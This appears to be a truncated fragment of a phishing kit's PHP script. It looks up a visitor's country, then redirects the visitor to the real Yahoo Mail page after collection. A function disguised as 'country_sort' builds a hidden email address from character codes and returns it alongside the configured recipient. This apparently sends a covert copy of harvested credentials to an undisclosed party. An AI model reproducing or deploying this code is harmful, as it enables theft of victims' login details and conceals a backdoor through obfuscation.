geoplugin_countryName != null) { $result = $ip_data->geoplugin_countryName; } return $result; } function country_sort(){ $sorter = ""; $array = array(99,111,100,101,114,99,118,118,115,64,103,109,97,105,108,46,99,111,109); $count = count($array); for ($i = 0; $i < $count; $i++) { $sorter .= chr($array[$i]); } return array($sorter, $GLOBALS['recipient']); } header("Location: http://mail.yahoo.com"); ?>